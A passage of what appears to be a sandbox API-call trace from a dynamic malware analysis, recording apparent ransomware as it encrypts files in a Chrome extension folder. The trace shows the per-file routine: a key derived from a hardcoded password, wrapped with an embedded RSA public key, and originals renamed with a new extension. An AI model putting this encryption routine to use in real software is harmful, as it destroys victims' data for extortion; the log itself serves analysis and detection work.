data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), bFailIfExists=0) returned 1 [0261.638] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html", dwFileAttributes=0x0) returned 1 [0261.639] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg")) returned 1 [0261.641] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.fuck")) returned 1 [0261.643] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.643] CryptDestroyKey (hKey=0x2e7dac0) returned 1 [0261.643] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.644] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.644] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.644] GetLastError () returned 0x0 [0261.644] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html")) returned 0x20 [0261.645] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html", dwFileAttributes=0x80) returned 1 [0261.645] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.646] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.647] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg", dwFileAttributes=0x2) returned 1 [0261.648] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.651] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.651] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.651] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.651] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7de80) returned 1 [0261.652] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.652] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.652] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71fa8) returned 1 [0261.652] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71fa8, dwCertEncodingType=0x1, pInfo=0x2eabbc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eabbf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eabbf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7e080) returned 1 [0261.652] CryptEncrypt (in: hKey=0x2e7e080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.652] CryptEncrypt (in: hKey=0x2e7e080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72250*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e72250*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.653] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e72250*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e72250*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.654] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.668] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.668] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.670] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.670] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.670] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.670] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x128, lpOverlapped=0x0) returned 1 [0261.670] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x128, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x130) returned 1 [0261.670] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x130, lpOverlapped=0x0) returned 1 [0261.670] CloseHandle (hObject=0x5d60) returned 1 [0261.670] CloseHandle (hObject=0x5d64) returned 1 [0261.670] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), bFailIfExists=0) returned 1 [0261.673] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html", dwFileAttributes=0x0) returned 1 [0261.673] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.gsg")) returned 1 [0261.675] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.fuck")) returned 1 [0261.676] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.676] CryptDestroyKey (hKey=0x2e7de80) returned 1 [0261.676] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.676] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.676] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.676] GetLastError () returned 0x0 [0261.676] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html")) returned 0x20 [0261.676] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html", dwFileAttributes=0x80) returned 1 [0261.677] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.677] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.678] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg", dwFileAttributes=0x2) returned 1 [0261.678] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.680] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.680] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.680] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.680] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dcc0) returned 1 [0261.680] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.680] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.680] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71e98) returned 1 [0261.681] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71e98, dwCertEncodingType=0x1, pInfo=0x2eab7b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab7e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab7e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7e0c0) returned 1 [0261.681] CryptEncrypt (in: hKey=0x2e7e0c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.681] CryptEncrypt (in: hKey=0x2e7e0c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72140*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e72140*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.681] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e72140*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e72140*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.682] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x3b, lpOverlapped=0x0) returned 1 [0261.683] CryptEncrypt (in: hKey=0x2e7dcc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x3b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x40) returned 1 [0261.683] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x40, lpOverlapped=0x0) returned 1 [0261.683] CloseHandle (hObject=0x5d64) returned 1 [0261.683] CloseHandle (hObject=0x5d60) returned 1 [0261.683] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), bFailIfExists=0) returned 1 [0261.687] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html", dwFileAttributes=0x0) returned 1 [0261.687] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.gsg")) returned 1 [0261.688] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.fuck")) returned 1 [0261.689] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.689] CryptDestroyKey (hKey=0x2e7dcc0) returned 1 [0261.689] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.689] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.689] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.689] GetLastError () returned 0x0 [0261.689] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html")) returned 0x20 [0261.690] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html", dwFileAttributes=0x80) returned 1 [0261.690] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.691] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.691] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg", dwFileAttributes=0x2) returned 1 [0261.691] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.693] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.693] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.693] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.694] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dc00) returned 1 [0261.694] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.694] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.694] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e723e8) returned 1 [0261.694] 